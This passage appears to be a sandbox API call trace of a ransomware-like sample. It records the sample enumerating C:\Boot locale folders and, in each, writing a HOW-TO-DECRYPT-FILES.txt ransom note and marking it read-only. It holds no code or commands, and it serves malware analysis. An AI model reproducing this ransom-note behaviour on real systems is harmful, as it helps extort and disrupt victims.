lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0045.035] GetLastError () returned 0x0 [0045.035] FindNextFileW (in: hFindFile=0x3609e0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0045.035] GetLastError () returned 0x0 [0045.035] FindNextFileW (in: hFindFile=0x3609e0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0 [0045.035] GetLastError () returned 0x12 [0045.035] FindClose (in: hFindFile=0x3609e0 | out: hFindFile=0x3609e0) returned 1 [0045.035] SetErrorMode (uMode=0x0) returned 0x1 [0045.035] GetFullPathNameW (in: lpFileName="C:\\Boot\\nl-NL", nBufferLength=0x105, lpBuffer=0x18e944, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\nl-NL", lpFilePart=0x0) returned 0xd [0045.035] GetLastError () returned 0x12 [0045.035] SetErrorMode (uMode=0x1) returned 0x0 [0045.035] FindFirstFileW (in: lpFileName="C:\\Boot\\nl-NL\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x3609e0 [0045.035] GetLastError () returned 0x12 [0045.035] FindNextFileW (in: hFindFile=0x3609e0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0045.035] GetLastError () returned 0x12 [0045.035] FindNextFileW (in: hFindFile=0x3609e0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0045.035] GetLastError () returned 0x12 [0045.035] FindNextFileW (in: hFindFile=0x3609e0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0 [0045.035] GetLastError () returned 0x12 [0045.035] FindClose (in: hFindFile=0x3609e0 | out: hFindFile=0x3609e0) returned 1 [0045.035] SetErrorMode (uMode=0x0) returned 0x1 [0045.035] GetFullPathNameW (in: lpFileName="C:\\Boot\\nl-NL\\bootmgr.exe.mui", nBufferLength=0x105, lpBuffer=0x18e9f8, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\nl-NL\\bootmgr.exe.mui", lpFilePart=0x0) returned 0x1d [0045.036] GetLastError () returned 0x12 [0045.036] SetErrorMode (uMode=0x1) returned 0x0 [0045.036] GetFileAttributesExW (in: lpFileName="C:\\Boot\\nl-NL\\bootmgr.exe.mui" (normalized: "c:\\boot\\nl-nl\\bootmgr.exe.mui"), fInfoLevelId=0x0, lpFileInformation=0x1cf37f4 | out: lpFileInformation=0x1cf37f4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x55333320, ftCreationTime.dwHighDateTime=0x1d2da3e, ftLastAccessTime.dwLowDateTime=0xe8bf7f00, ftLastAccessTime.dwHighDateTime=0x1d2f581, ftLastWriteTime.dwLowDateTime=0xe84c457e, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16250)) returned 1 [0045.036] GetLastError () returned 0x12 [0045.036] SetErrorMode (uMode=0x0) returned 0x1 [0045.036] GetFullPathNameW (in: lpFileName="C:\\Boot\\nl-NL\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e8a4, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\nl-NL\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x26 [0045.036] GetLastError () returned 0x12 [0045.036] SetErrorMode (uMode=0x1) returned 0x0 [0045.036] CreateFileW (lpFileName="C:\\Boot\\nl-NL\\HOW-TO-DECRYPT-FILES.txt" (normalized: "c:\\boot\\nl-nl\\how-to-decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x184 [0045.037] GetLastError () returned 0x0 [0045.037] GetFileType (hFile=0x184) returned 0x1 [0045.037] SetErrorMode (uMode=0x0) returned 0x1 [0045.037] GetFileType (hFile=0x184) returned 0x1 [0045.037] WriteFile (in: hFile=0x184, lpBuffer=0x1d0f47c*, nNumberOfBytesToWrite=0x18da, lpNumberOfBytesWritten=0x18ee04, lpOverlapped=0x0 | out: lpBuffer=0x1d0f47c*, lpNumberOfBytesWritten=0x18ee04*=0x18da, lpOverlapped=0x0) returned 1 [0045.038] GetLastError () returned 0x0 [0045.038] CloseHandle (hObject=0x184) returned 1 [0045.038] GetLastError () returned 0x0 [0045.038] GetFullPathNameW (in: lpFileName="C:\\Boot\\nl-NL\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e9cc, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\nl-NL\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x26 [0045.038] GetLastError () returned 0x0 [0045.038] SetFileAttributesW (lpFileName="C:\\Boot\\nl-NL\\HOW-TO-DECRYPT-FILES.txt", dwFileAttributes=0x1) returned 1 [0045.038] GetLastError () returned 0x0 [0045.038] GetFullPathNameW (in: lpFileName="C:\\Boot\\pl-PL", nBufferLength=0x105, lpBuffer=0x18ea6c, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\pl-PL", lpFilePart=0x0) returned 0xd [0045.038] GetLastError () returned 0x0 [0045.038] GetSystemDirectoryW (in: lpBuffer=0x364560, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0045.038] GetLastError () returned 0x0 [0045.038] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x18e990, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0045.038] GetLastError () returned 0x0 [0045.038] GetFullPathNameW (in: lpFileName="C:\\Boot\\pl-PL", nBufferLength=0x105, lpBuffer=0x18e944, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\pl-PL", lpFilePart=0x0) returned 0xd [0045.038] GetLastError () returned 0x0 [0045.038] SetErrorMode (uMode=0x1) returned 0x0 [0045.038] FindFirstFileW (in: lpFileName="C:\\Boot\\pl-PL\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x3609e0 [0045.038] GetLastError () returned 0x0 [0045.038] FindNextFileW (in: hFindFile=0x3609e0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0045.038] GetLastError () returned 0x0 [0045.038] FindNextFileW (in: hFindFile=0x3609e0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0045.038] GetLastError () returned 0x0 [0045.038] FindNextFileW (in: hFindFile=0x3609e0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0 [0045.039] GetLastError () returned 0x12 [0045.039] FindClose (in: hFindFile=0x3609e0 | out: hFindFile=0x3609e0) returned 1 [0045.039] SetErrorMode (uMode=0x0) returned 0x1 [0045.039] GetFullPathNameW (in: lpFileName="C:\\Boot\\pl-PL", nBufferLength=0x105, lpBuffer=0x18e944, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\pl-PL", lpFilePart=0x0) returned 0xd [0045.039] GetLastError () returned 0x12 [0045.039] SetErrorMode (uMode=0x1) returned 0x0 [0045.039] FindFirstFileW (in: lpFileName="C:\\Boot\\pl-PL\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x3609e0 [0045.039] GetLastError () returned 0x12 [0045.039] FindNextFileW (in: hFindFile=0x3609e0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0045.039] GetLastError () returned 0x12 [0045.039] FindNextFileW (in: hFindFile=0x3609e0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0045.039] GetLastError () returned 0x12 [0045.039] FindNextFileW (in: hFindFile=0x3609e0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0 [0045.039] GetLastError () returned 0x12 [0045.039] FindClose (in: hFindFile=0x3609e0 | out: hFindFile=0x3609e0) returned 1 [0045.039] SetErrorMode (uMode=0x0) returned 0x1 [0045.039] GetFullPathNameW (in: lpFileName="C:\\Boot\\pl-PL\\bootmgr.exe.mui", nBufferLength=0x105, lpBuffer=0x18e9f8, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\pl-PL\\bootmgr.exe.mui", lpFilePart=0x0) returned 0x1d [0045.039] GetLastError () returned 0x12 [0045.039] SetErrorMode (uMode=0x1) returned 0x0 [0045.039] GetFileAttributesExW (in: lpFileName="C:\\Boot\\pl-PL\\bootmgr.exe.mui" (normalized: "c:\\boot\\pl-pl\\bootmgr.exe.mui"), fInfoLevelId=0x0, lpFileInformation=0x1d12184 | out: lpFileInformation=0x1d12184*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x55359480, ftCreationTime.dwHighDateTime=0x1d2da3e, ftLastAccessTime.dwLowDateTime=0xe8bf7f00, ftLastAccessTime.dwHighDateTime=0x1d2f581, ftLastWriteTime.dwLowDateTime=0xe9e5ad4a, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16250)) returned 1 [0045.039] GetLastError () returned 0x12 [0045.039] SetErrorMode (uMode=0x0) returned 0x1 [0045.041] GetFullPathNameW (in: lpFileName="C:\\Boot\\pl-PL\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e8a4, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\pl-PL\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x26 [0045.041] GetLastError () returned 0x12 [0045.041] SetErrorMode (uMode=0x1) returned 0x0 [0045.041] CreateFileW (lpFileName="C:\\Boot\\pl-PL\\HOW-TO-DECRYPT-FILES.txt" (normalized: "c:\\boot\\pl-pl\\how-to-decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x184 [0045.041] GetLastError () returned 0x0 [0045.041] GetFileType (hFile=0x184) returned 0x1 [0045.041] SetErrorMode (uMode=0x0) returned 0x1 [0045.041] GetFileType (hFile=0x184) returned 0x1 [0045.042] WriteFile (in: hFile=0x184, lpBuffer=0x1b2b758*, nNumberOfBytesToWrite=0x18da, lpNumberOfBytesWritten=0x18ee04, lpOverlapped=0x0 | out: lpBuffer=0x1b2b758*, lpNumberOfBytesWritten=0x18ee04*=0x18da, lpOverlapped=0x0) returned 1 [0045.042] GetLastError () returned 0x0 [0045.042] CloseHandle (hObject=0x184) returned 1 [0045.043] GetLastError () returned 0x0 [0045.043] GetFullPathNameW (in: lpFileName="C:\\Boot\\pl-PL\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e9cc, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\pl-PL\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x26 [0045.043] GetLastError () returned 0x0 [0045.043] SetFileAttributesW (lpFileName="C:\\Boot\\pl-PL\\HOW-TO-DECRYPT-FILES.txt", dwFileAttributes=0x1) returned 1 [0045.043] GetLastError () returned 0x0 [0045.043] GetFullPathNameW (in: lpFileName="C:\\Boot\\pt-BR", nBufferLength=0x105, lpBuffer=0x18ea6c, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\pt-BR", lpFilePart=0x0) returned 0xd [0045.043] GetLastError () returned 0x0 [0045.043] GetSystemDirectoryW (in: lpBuffer=0x364560, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0045.043] GetLastError () returned 0x0 [0045.043] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x18e990, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0045.043] GetLastError () returned 0x0 [0045.043] GetFullPathNameW (in: lpFileName="C:\\Boot\\pt-BR", nBufferLength=0x105, lpBuffer=0x18e944, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\pt-BR", lpFilePart=0x0) returned 0xd [0045.043] GetLastError () returned 0x0 [0045.043] SetErrorMode (uMode=0x1) returned 0x0 [0045.043] FindFirstFileW (in: lpFileName="C:\\Boot\\pt-BR\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x3609e0 [0045.043] GetLastError () returned 0x0 [0045.043] FindNextFileW (in: hFindFile=0x3609e0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0045.043] GetLastError () returned 0x0 [0045.043] FindNextFileW (in: hFindFile=0x3609e0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0045.043] GetLastError () returned 0x0 [0045.043] FindNextFileW (in: hFindFile=0x3609e0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0 [0045.043] GetLastError () returned 0x12 [0045.043] FindClose (in: hFindFile=0x3609e0 | out: hFindFile=0x3609e0) returned 1 [0045.043] SetErrorMode (uMode=0x0) returned 0x1 [0045.043] GetFullPathNameW (in: lpFileName="C:\\Boot\\pt-BR", nBufferLength=0x105, lpBuffer=0x18e944, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\pt-BR", lpFilePart=0x0) returned 0xd [0045.043] GetLastError () returned 0x12 [0045.043] SetErrorMode (uMode=0x1) returned 0x0 [0045.044] FindFirstFileW (in: lpFileName="C:\\Boot\\pt-BR\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x3609e0 [0045.044] GetLastError () returned 0x12 [0045.044] FindNextFileW (in: hFindFile=0x3609e0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0045.044] GetLastError () returned 0x12 [0045.044] FindNextFileW (in: hFindFile=0x3609e0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0045.044] GetLastError () returned 0x12 [0045.044] FindNextFileW (in: hFindFile=0x3609e0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0 [0045.044] GetLastError () returned 0x12 [0045.044] FindClose (in: hFindFile=0x3609e0 | out: hFindFile=0x3609e0) returned 1 [0045.044] SetErrorMode (uMode=0x0) returned 0x1 [0045.044] GetFullPathNameW (in: lpFileName="C:\\Boot\\pt-BR\\bootmgr.exe.mui", nBufferLength=0x105, lpBuffer=0x18e9f8, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\pt-BR\\bootmgr.exe.mui", lpFilePart=0x0) returned 0x1d [0045.044] GetLastError () returned 0x12 [0045.044] SetErrorMode (uMode=0x1) returned 0x0 [0045.044] GetFileAttributesExW (in: lpFileName="C:\\Boot\\pt-BR\\bootmgr.exe.mui" (normalized: "c:\\boot\\pt-br\\bootmgr.exe.mui"), fInfoLevelId=0x0, lpFileInformation=0x1b2e460 | out: lpFileInformation=0x1b2e460*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x55359480, ftCreationTime.dwHighDateTime=0x1d2da3e, ftLastAccessTime.dwLowDateTime=0xe8c1e060, ftLastAccessTime.dwHighDateTime=0x1d2f581, ftLastWriteTime.dwLowDateTime=0xe83b9c0f, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16040)) returned 1 [0045.044] GetLastError () returned 0x12 [0045.044] SetErrorMode (uMode=0x0) returned 0x1 [0045.045] GetFullPathNameW (in: lpFileName="C:\\Boot\\pt-BR\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e8a4, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\pt-BR\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x26 [0045.045] GetLastError () returned 0x12 [0045.045] SetErrorMode (uMode=0x1) returned 0x0 [0045.045] CreateFileW (lpFileName="C:\\Boot\\pt-BR\\HOW-TO-DECRYPT-FILES.txt" (normalized: "c:\\boot\\pt-br\\how-to-decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x184 [0045.045] GetLastError () returned 0x0 [0045.045] GetFileType (hFile=0x184) returned 0x1 [0045.045] SetErrorMode (uMode=0x0) returned 0x1 [0045.045] GetFileType (hFile=0x184) returned 0x1 [0045.045] WriteFile (in: hFile=0x184, lpBuffer=0x1b4a2f8*, nNumberOfBytesToWrite=0x18da, lpNumberOfBytesWritten=0x18ee04, lpOverlapped=0x0 | out: lpBuffer=0x1b4a2f8*, lpNumberOfBytesWritten=0x18ee04*=0x18da, lpOverlapped=0x0) returned 1 [0045.046] GetLastError () returned 0x0 [0045.046] CloseHandle (hObject=0x184) returned 1 [0045.046] GetLastError () returned 0x0 [0045.046] GetFullPathNameW (in: lpFileName="C:\\Boot\\pt-BR\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e9cc, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\pt-BR\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x26 [0045.046] GetLastError () returned 0x0 [0045.046] SetFileAttributesW (lpFileName="C:\\Boot\\pt-BR\\HOW-TO-DECRYPT-FILES.txt", dwFileAttributes=0x1) returned 1 [0045.046] GetLastError () returned 0x0 [0045.046] GetFullPathNameW (in: lpFileName="C:\\Boot\\pt-PT", nBufferLength=0x105, lpBuffer=0x18ea6c, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\pt-PT", lpFilePart=0x0) returned 0xd [0045.046] GetLastError () returned 0x0 [0045.046] GetSystemDirectoryW (in: lpBuffer=0x364560, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0045.046] GetLastError () returned 0x0 [0045.047] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x18e990, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0045.047] GetLastError () returned 0x0 [0045.047] GetFullPathNameW (in: lpFileName="C:\\Boot\\pt-PT", nBufferLength=0x105, lpBuffer=0x18e944, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\pt-PT", lpFilePart=0x0) returned 0xd [0045.047] GetLastError () returned 0x0 [0045.047] SetErrorMode (uMode=0x1) returned 0x0 [0045.047] FindFirstFileW (in: lpFileName="C:\\Boot\\pt-PT\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x3609e0 [0045.047] GetLastError () returned 0x0 [0045.047] FindNextFileW (in: hFindFile=0x3609e0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0045.047] GetLastError () returned 0x0 [0045.047] FindNextFileW (in: hFindFile=0x3609e0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0045.047] GetLastError () returned 0x0 [0045.047] FindNextFileW (in: hFindFile=0x3609e0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0 [0045.047] GetLastError () returned 0x12 [0045.047] FindClose (in: hFindFile=0x3609e0 | out: hFindFile=0x3609e0) returned 1 [0045.047] SetErrorMode (uMode=0x0) returned 0x1 [0045.047] GetFullPathNameW (in: lpFileName="C:\\Boot\\pt-PT", nBufferLength=0x105, lpBuffer=0x18e944, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\pt-PT", lpFilePart=0x0) returned 0xd [0045.047] GetLastError () returned 0x12 [0045.047] SetErrorMode (uMode=0x1) returned 0x0 [0045.047] FindFirstFileW (in: lpFileName="C:\\Boot\\pt-PT\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x3609e0 [0045.047] GetLastError () returned 0x12 [0045.047] FindNextFileW (in: hFindFile=0x3609e0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0045.047] GetLastError () returned 0x12 [0045.047] FindNextFileW (in: hFindFile=0x3609e0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0045.047] GetLastError () returned 0x12 [0045.047] FindNextFileW (in: hFindFile=0x3609e0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0 [0045.047] GetLastError () returned 0x12 [0045.047] FindClose (in: hFindFile=0x3609e0 | out: hFindFile=0x3609e0) returned 1 [0045.047] SetErrorMode (uMode=0x0) returned 0x1 [0045.048] GetFullPathNameW (in: lpFileName="C:\\Boot\\pt-PT\\bootmgr.exe.mui", nBufferLength=0x105, lpBuffer=0x18e9f8, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\pt-PT\\bootmgr.exe.mui", lpFilePart=0x0) returned 0x1d [0045.048] GetLastError () returned 0x12 [0045.048] SetErrorMode (uMode=0x1) returned 0x0 [0045.048] GetFileAttributesExW (in: lpFileName="C:\\Boot\\pt-PT\\bootmgr.exe.mui" (normalized: "c:\\boot\\pt-pt\\bootmgr.exe.mui"), fInfoLevelId=0x0, lpFileInformation=0x1b4d000 | out: lpFileInformation=0x1b4d000*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x55359480, ftCreationTime.dwHighDateTime=0x1d2da3e, ftLastAccessTime.dwLowDateTime=0xe8c1e060, ftLastAccessTime.dwHighDateTime=0x1d2f581, ftLastWriteTime.dwLowDateTime=0xe823ce95, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15e40)) returned 1 [0045.048] GetLastError () returned 0x12 [0045.048] SetErrorMode (uMode=0x0) returned 0x1 [0045.048] GetFullPathNameW (in: lpFileName="C:\\Boot\\pt-PT\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e8a4, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\pt-PT\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x26 [0045.048] GetLastError () returned 0x12 [0045.048] SetErrorMode (uMode=0x1) returned 0x0 [0045.048] CreateFileW (lpFileName="C:\\Boot\\pt-PT\\HOW-TO-DECRYPT-FILES.txt" (normalized: "c:\\boot\\pt-pt\\how-to-decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x184 [0045.048] GetLastError () returned 0x0 [0045.048] GetFileType (hFile=0x184) returned 0x1 [0045.048] SetErrorMode (uMode=0x0) returned 0x1 [0045.048] GetFileType (hFile=0x184) returned 0x1 [0045.048] WriteFile (in: hFile=0x184, lpBuffer=0x1b68e98*, nNumberOfBytesToWrite=0x18da, lpNumberOfBytesWritten=0x18ee04, lpOverlapped=0x0 | out: lpBuffer=0x1b68e98*, lpNumberOfBytesWritten=0x18ee04*=0x18da, lpOverlapped=0x0) returned 1 [0045.049] GetLastError () returned 0x0 [0045.049] CloseHandle (hObject=0x184) returned 1 [0045.049] GetLastError () returned 0x0 [0045.049] GetFullPathNameW (in: lpFileName="C:\\Boot\\pt-PT\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e9cc, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\pt-PT\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x26 [0045.049] GetLastError () returned 0x0 [0045.049] SetFileAttributesW (lpFileName="C:\\Boot\\pt-PT\\HOW-TO-DECRYPT-FILES.txt", dwFileAttributes=0x1) returned 1 [0045.050] GetLastError () returned 0x0 [0045.050] GetFullPathNameW (in: lpFileName="C:\\Boot\\ru-RU", nBufferLength=0x105, lpBuffer=0x18ea6c, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\ru-RU", lpFilePart=0x0) returned 0xd [0045.050] GetLastError () returned 0x0 [0045.050] GetSystemDirectoryW (in: lpBuffer=0x364560, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0045.050] GetLastError () returned 0x0 [0045.050] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x18e990, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0045.050] GetLastError () returned 0x0 [0045.050] GetFullPathNameW (in: lpFileName="C:\\Boot\\ru-RU", nBufferLength=0x105, lpBuffer=0x18e944, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\ru-RU", lpFilePart=0x0) returned 0xd [0045.050] GetLastError () returned 0x0 [0045.050] SetErrorMode (uMode=0x1) returned 0x0 [0045.050] FindFirstFileW (in: lpFileName="C:\\Boot\\ru-RU\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x3609e0 [0045.050] GetLastError () returned 0x0 [0045.050] FindNextFileW (in: hFindFile=0x3609e0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0045.050] GetLastError () returned 0x0 [0045.050] FindNextFileW (in: hFindFile=0x3609e0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0045.050] GetLastError () returned 0x0 [0045.050] FindNextFileW (in: hFindFile=0x3609e0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0 [0045.050] GetLastError () returned 0x12 [0045.050] FindClose (in: hFindFile=0x3609e0 | out: hFindFile=0x3609e0) returned 1 [0045.051] SetErrorMode (uMode=0x0) returned 0x1 [0045.051] GetFullPathNameW (in: lpFileName="C:\\Boot\\ru-RU", nBufferLength=0x105, lpBuffer=0x18e944, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\ru-RU", lpFilePart=0x0) returned 0xd [0045.051] GetLastError () returned 0x12 [0045.051] SetErrorMode (uMode=0x1) returned 0x0 [0045.051] FindFirstFileW (in: lpFileName="C:\\Boot\\ru-RU\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x3609e0 [0045.051] GetLastError () returned 0x12 [0045.051] FindNextFileW (in: hFindFile=0x3609e0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0045.051] GetLastError () returned 0x12 [0045.051] FindNextFileW (in: hFindFile=0x3609e0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0045.051] GetLastError () returned 0x12 [0045.051] FindNextFileW (in: hFindFile=0x3609e0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0 [0045.051] GetLastError () returned 0x12 [0045.051] FindClose (in: hFindFile=0x3609e0 | out: hFindFile=0x3609e0) returned 1 [0045.051] SetErrorMode (uMode=0x0) returned 0x1 [0045.051] GetFullPathNameW (in: lpFileName="C:\\Boot\\ru-RU\\bootmgr.exe.mui", nBufferLength=0x105, lpBuffer=0x18e9f8, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\ru-RU\\bootmgr.exe.mui", lpFilePart=0x0) returned 0x1d [0045.051] GetLastError () returned 0x12 [0045.051] SetErrorMode (uMode=0x1) returned 0x0 [0045.051] GetFileAttributesExW (in: lpFileName="C:\\Boot\\ru-RU\\bootmgr.exe.mui" (normalized: "c:\\boot\\ru-ru\\bootmgr.exe.mui"), fInfoLevelId=0x0, lpFileInformation=0x1b6bba0 | out: lpFileInformation=0x1b6bba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5537f5e0, ftCreationTime.dwHighDateTime=0x1d2da3e, ftLastAccessTime.dwLowDateTime=0xe8c1e060, ftLastAccessTime.dwHighDateTime=0x1d2f581, ftLastWriteTime.dwLowDateTime=0xe88a2888, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16050)) returned 1 [0045.052] GetLastError () returned 0x12 [0045.052] SetErrorMode (uMode=0x0) returned 0x1 [0045.052] GetFullPathNameW (in: lpFileName="C:\\Boot\\ru-RU\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e8a4, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\ru-RU\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x26 [0045.052] GetLastError () returned 0x12 [0045.052] SetErrorMode (uMode=0x1) returned 0x0 [0045.052] CreateFileW (lpFileName="C:\\Boot\\ru-RU\\HOW-TO-DECRYPT-FILES.txt" (normalized: "c:\\boot\\ru-ru\\how-to-decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x184 [0045.052] GetLastError () returned 0x0 [0045.052] GetFileType (hFile=0x184) returned 0x1 [0045.052] SetErrorMode (uMode=0x0) returned 0x1 [0045.052] GetFileType (hFile=0x184) returned 0x1 [0045.052] WriteFile (in: hFile=0x184, lpBuffer=0x1b87a38*, nNumberOfBytesToWrite=0x18da, lpNumberOfBytesWritten=0x18ee04, lpOverlapped=0x0 | out: lpBuffer=0x1b87a38*, lpNumberOfBytesWritten=0x18ee04*=0x18da, lpOverlapped=0x0) returned 1 [0045.053] GetLastError () returned 0x0 [0045.053] CloseHandle (hObject=0x184) returned 1 [0045.053] GetLastError () returned 0x0 [0045.053] GetFullPathNameW (in: lpFileName="C:\\Boot\\ru-RU\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e9cc, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\ru-RU\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x26 [0045.053] GetLastError () returned 0x0 [0045.053] SetFileAttributesW (lpFileName="C:\\Boot\\ru-RU\\HOW-TO-DECRYPT-FILES.txt", dwFileAttributes=0x1) returned 1 [0045.053] GetLastError () returned 0x0 [0045.053] GetFullPathNameW (in: lpFileName="C:\\Boot\\sv-SE", nBufferLength=0x105, lpBuffer=0x18ea6c, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\sv-SE", lpFilePart=0x0) returned 0xd [0045.053] 